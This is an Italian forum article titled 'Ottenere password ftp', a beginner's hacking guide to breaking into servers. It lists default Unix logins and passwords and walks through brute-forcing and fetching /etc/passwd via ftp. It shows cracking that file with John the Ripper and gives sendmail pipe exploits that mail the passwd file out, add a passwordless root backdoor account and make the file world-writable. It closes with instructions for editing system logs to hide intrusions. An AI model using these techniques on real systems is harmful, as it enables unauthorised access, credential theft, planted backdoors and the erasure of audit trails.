Rdevo.com community
  Articoli 
 

Visitatori
Visitatori Correnti : 65
Membri : 0

Per visualizzare la lista degli utenti collegati alla community, devi essere un utente registrato.
Iscriviti

Iscritti
 Utenti: 17
Ultimo iscritto : marcowell
Lista iscritti

I preferiti
RemoveWat Win7 (528)
Realizzazioni grafiche e siti web (292)

Royalmotorhouse

Articoli

  

Eventi
<
Giugno
2029
>
L M M G V S D
-- -- -- -- 01 02 03
04 05 06 07 08 09 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 --

Questa settimana

 
Ottenere password ftp
Inserito il 31 marzo 2014 alle 15:05:57 da admin.

In questa guida scopriremo come ottenere delle password per entrare in un sistema,come decriptarle e

LE INFORMAZIONI CONTENUTE IN QUESTO DOCUMENTO SONO SOLO A SCOPO ILLUSTRATIVO, IO INTESTATARIO NON MI ASSUMO NESSUNA RESPONSABILITà PER USO ILLECITO DI QUESTE.

 

OTTENERE UNA PASSWORD

 

Allora,

 

ciao a tutti!!!!!

 

Voglio avvisare tutti che non è che io sia un grande esperto nel campo dell' hacking ma ne so semplicemente qualcosa.

 

Iniziamo con l' occorrente:

 

 

Programmi:

 

Brutus o Unsecure

 

John the ripper

 

NetInfo

 

 

Requisiti:

 

Saper usare il DOS ( john the ripper funziona solo sotto sto sistema )

 

Sapere qualcosa dell' hacking

 

Avere un po' di pazienza e voglia di fondersi il cervello

 

Io ho scritto questa guida per coloro che hanno già letto qualche guida all' hacking e che vogliono approfondire l' argomento delle password (come scoprirle,decriptarle.....) e non per quelli che l' hacking non sanno nemmeno cosa sia.

Ho scritto questa guida perchè in molte guide all' hacking non è scritto come decriptare le password,anche se è importantissimo.

Innanzi tutto procuratevi i programmi sopra citati perchè sono indispensabili per ottenere delle password.

Poi studiate bene l' hacking e adesso passiamo ad otttenere una pass

giusta per il sistema.

 

Come saprete già ci sono 3 metodi per entrare in un sistema:

 

-Default Login

 

-Password List

 

-Backdoors

 

Il primo metodo consiste nell' inserire,durante la procedura di login, le password e i login più comuni.Alcune volte sto metodo funziona per

la scarsa intelligenza dei sysop,che non cambiano i login e le password

di default.Altre volte non funziona.Cmq vi do le pass di default:

 

LOGIN PASSWORD

 

 

 

root root, system, sysop, nomesistema, nomepersona quando il root è fingerato (

 

 il finger è uno strumento per prendere informazioni su qualcosa collegato ad

 

 internet ), none, provare anche le password della lista sotto. Molto importante!

 

sys sys, system, manager, nomedelsistema, vedi root

 

daemon daemon, background, none

 

uucp uucp, vedi guest

 

tty tty

 

test test

 

unix unix, test

 

bin bin, system, vedi root

 

adm adm, admin, sys, vedi root

 

admin adm, admin

 

sysman sysman, sys, system

 

sysadmin sysadmin, sys, system, admin, adm

 

who who, none

 

learn learn

 

uuhost uuhost

 

guest guest, user, anonymous, visitor, bbs, nome del sistema o dell'organizzazione.

 

host host

 

nuucp nuucp, vedi uucp

 

rje rje, none, vedi root

 

games games, player

 

sysop sysop

 

demo demo, nomedelsistema, none

 

visitor vedi guest

 

anonymous vedi guest

 

anon vedi guest

 

user vedi guest

 

nomedelsistema vedi guest

 

student student, vedi guest

 

ftp ftp, ftpuser, vedi guest

 

ftpuser vedi ftp

 

xxcp xenix

 

system manager

 

nobody nobody, none

 

field service

 

archie archie, none

 

qarchie qarchie, none

 

whois whois, none

 

bbs nomedelsistema, bbs, waffle, none

 

services nomedelsistema, services, none

 

info nomedelsistema, info, none

 

new nomedelsistema, new, none

 

newuser nomedelsistema, newuser, none

 

ingres none, ingres, nomedelsistema

 

date date, none

 

lpq lpq, none

 

time time, none

 

weather weather, forecast, none

 

forcast vedi weather

 

help help, none

 

test nomedelsistema, test, none

 

waffle vedi bbs

 

trouble trouble, vedi root

 

lp lp, printer, print, vedi root

 

unmountsys unmountsys, unmount, vedi root

 

setup setup, vedi root

 

makefsys makefsys, vedi root

 

sysadm sysadm, sys, system, vedi sys-adm-root

 

powerdown powerdown, vedi root

 

mountfsys mountfsys, vedi root

 

checkfsys checkfsys, vedi root

 

Il secondo metodo consiste nello sferrare un attacco brute force: prendete un programma tipo Unsecure o Brutus,prendete un login che avete ricavato e attraverso una password list cercate di scoprire la password corrispondente tramite la tecnica brute force.

Il terzo metodo consiste nello scoprire una password per il sistema attraverso lunghe ricerche sul programmatore del sistema. Bisogna apprendere du tutto sulla sua vita,i suoi hobby e tanto altro. Comunque se si cerca bene si riuscirà a scoprire una qualche password per entrare.

Un altro metodo consiste nel fingerare ( tramite Telnet:aprite il prompt di dos e digitate "telnet finger www.serverdahackerare.com ) .

 

Inoltre per cercare ancora più info sul server si può aprire il prompt di DOS e digitare "telnet whois www.serverdahackerare.com". 

Se siete fortunati grazie a questi metodi potete addirittura riscire a leggere il file passwd. Durante il whois e il finger vi ricordo che verrete loggati.

Mi hanno detto che se usate un server proxy attivo ( se ne trovano con una ricerca sul Web ) potete navigare in modo anonimo. Come configurare un server proxy: nella barra di explorer andate in strumenti: opzioni internet->connessioni adesso selezionate la connessione che usate e andate su impostaioni, digitate l' IP del server proxy che volete usare e la sua porta. a questo punto dovreste navigare anonimi e potete guardare il passwd in questo modo : digitate nella barra URL:

 

http://www.serverdahackerare.com/ftp/etc/passwd

 

oppure

 

ftp://ftp.serverdahackerare.com/etc/passwd

 

Su questa tecnica non sono sicuro del fatto che non verrete loggati,anche se in teoria dovrebbe essere così.........

 

Comunque se dovete usarla fatelo da qualche Internet cafè.

 

Se dovete usare i proxy scaricate il prog MultiProxy da www.multiproxy.org . Avviatelo e andate a options->menu->proxy server list->file->import proxy list . In questo modo avete importato un lista di server proxy ( le trovate su multiproxy.org ). Poi sempre sulla stessa schermata andate su menu->proxy list-> test all proxyes .

A questo punto il programma testa i proxy nella lista e evidenzia quelli attivi con un pallino verde, e potete quindi utilizzarli.

Vi ricordo che una volta scoperti dei login dovete cercare ulteriori informazioni su di essi tramite NetInfo.

Una volta scoperta una password utilizzatela per ottenere la password del root ( se avete avuto culo potreste averla già ottenuta ) .Per fare questo bisogna scaricare il file /etc/passwd ( oppure potete guardare via porta 23 il passwd file e fare 1 copia&incolla ) . Aprite ftp e digitate login e password ottenute, a questo punto andate nella directrory /etc e scrivete "get passwd C:\ ". A questo punto dovreste avere scaricato in C:\ il file passwd ( vi ricordo che queste operazioni vengono registrarte dai file log,quindi attenti ) . Attraverso il prompt di DOS utilizzate john the ripper per decriptare il passwd file.Anche john the ripper per decriptare le password usa una password list quindi se non riuscite ad ottenere la pass del root provate ad usare un altra lista

 

( se ne trovano con un po' di ricerca sul Web ) . Per usare il john dovete digitare questo.

 

C:\john-16\run>john C:\passwd

 

Decripta il passwd file con la passw list di john the ripper

 

C:\john-16\run>john -w:C:\passwdlist.txt C:\passwd

 

Decripta il passwd file con una passwd list che gli indichiamo noi

 

( nel nostro caso C:\passwdlist.txt ) .

 

C:\john-16\run>john -show C:\passwd

 

Decripta il passwd file e mostra le password che è riuscito a decriptare.

 

C:\john-16\run>john -user:root -show C:\passwd

 

Decripta la password di un utente che gli indichiamo ( nel nostro caso

 

era il root ) e ve la fa vedere.

 

C.\john-16\run>john -i C:\passwd

 

Vi da delle possibili password ricavate dal passwd file ( da usare solo in casi disperati ) .

Naturalmente non vi spiego tutti i comandi del john ma solo quelli fondamentali,perchè c'è un intero manuale sull'argomento ( nella directory doc del john ). Io stesso ho imparato ad usarlo leggendo gli esempi proposti dal manuale.

Se non riuscite ad ottenere nessuna pass x il sistema 8 neanche quella di un user regolare ) potete mandare una fakemail ( dovreste saperlo fare ) . In queste fakemail inseriremo diciture che fanno incasinare il sistema e permettono di "toccare" informazioni riservate ( naturalmente bisogna che il server da attaccare sia vulnerabile a questi bug ) . Se ad esempio vogliamo ricevere il file passwd via e-mail possiamo scrivere una fakemail del tipo:

 

HELO hacker.com

 

MAIL FROM:<"|/bin/mail indirizzomittentefile@mail.net < /etc/passwd">

 

RCPT TO:<"indirizzodestinatariofile@mail.net">

 

DATA

 

questa e` una prova...

 

.

 

QUIT

 

 

 

Oppure x manipolare un po' il passwd file possiamo scrivere:

 

 

 

HELO hackers.com

 

MAIL FROM: |/usr/ucb/tail|/usr/bin/sh

 

RCPT TO: prova

 

DATA

 

From: tuonome@tuamail.net

 

Return-Receipt-To: |nessuno

 

#!/bin/sh

 

COMANDI

 

.

 

QUIT

 

 

 

Al posto di "COMANDI" dobbiamo inserire appunto dei comandi ( ovvio ) .

Ecco i comandi che possiamo inserire:

 

/bin/mail tuonome@tuamail.net < /etc/passwd

 

X ricevere il pass via e-mail

echo Shade::0::/usr/local:/bin/bash >> /etc/passwd

 

X inserire una backdoor con login Shade,accesso root e nessuna password nel passwd file ( potete cambiare login , UID, directory e shell ) .

chmod 777 /etc/passwd

 

X rendere il passwd file prelevabile da chiunque.

Naturalmente ci sono altri bug x prelevare il passwd ma qui ho inserito

solo quelli ke conosco.

 

se poi non volete sfruttare queti bug collegandovi alla porta 25 potete usare l' ftp bounce ( trovate vari tutorial su di esso in rete ) .

Una volta ottenuta la password del root possiamo entrare nel sistema per hackerarlo. Vi ricordo che dopo ogni hackeraggio dovete toglierli dai file log ( spero sappiate cosa sono ) . I log vanno editati ma non cancellati. Ecco come editarli:

 

I file log + importanti sono:

 

 

 

/etc/log ( di default )

 

/tmp/log oppure /temp/var/log

 

/var/run

 

/var/log

 

/usr/log oppure /usr/adm/log

 

/usr/adm/sulog oppure /usr/adm/su_log

 

/usr/adm/loginlog oppure /usr/adm/acct/loginlog

 

/usr/adm/errlog

 

/usr/adm/culog

 

/sbin

 

Comunque quando entrate in una directory in cui sono contenuti i log fatevi dare dal server la lista dei file presenti ( per farlo digitate ls-al ).

Prima ho detto che questi file vanno modificati, non cancellati. Ma come fare per modificarli ?

Poniamo l' esempio che debba cancellare il file log /var/log. Dovrò digitare i seguenti comandi:

 

$pwd

 

Current directory is /etc

 

$cd / ( oppure cd .. )

 

$cd var

 

$vi log

 

A questo punto guardo il file log e cerco le informazioni che esso contiene su di me ,per poi cancellarle.Potete anche cancellare tutte le lettere eccetto 2 o 3 di cui è composto il log, in modo da cancellarlo quasi del tutto e da lasciarlo senza nessuna informazione su di voi. L' esempio di prima era solo per far capire come editare un file log. Se avete ancora problemi scrivetemi,e se siete in difficoltà non trascurate di farlo perché editare bene i log è importantissimo.

 

 

Ringraziamenti e fuck

 

Siamo quasi arrivati alla fine di questa guida.

 

Volevo ringraziare Dod x avermi insegnato ad usare i server proxy e Multiproxy, e xkè è sempre disponibile quando sono su IRC e gli chiedo

un aiuto e non si rompe ad aiutarmi ( o almeno non lo da a vedere ) .

Poi volevo ringraziare il grande Wolf Otakar x avermi dato la possibiltà di scrivere questa guida e metterla nella sua newsletter.

Infine volevo ringraziare il mitico Dejavu x aver pubblicato la mia guida sul sito della crew NSH.....Not Same Hacker ( #nsh su IRC ) .

Un bel fuck a tutti i lamer e ai cracker e a quei cretini che usano Internet x intraprendere traffici illegali di bambini.

 

Conclusione

 

Bene, spero che abbiate imparato ad ottenere e decriptare una password e ad editare i file log. Ho scritto questa guida in 2 giorni ed è la mia 1^ pubblicazione sull' hacking......siate comprensivi.

Non so se 1 giorno scriverò una guida completa all' hacking, chi può dirlo?Ma per il momento penso di no.

 

Ciao e alla prossima.:)

 

 

 


 

Calendari e quote



Tecnologia

Fonte Ansa.it

Versioni

 
 © RDevo.com 
Contattaci
Realizzato con ASP-Nuke
Questa pagina è stata eseguita in 2,664063secondi.
Versione stampabile Versione stampabile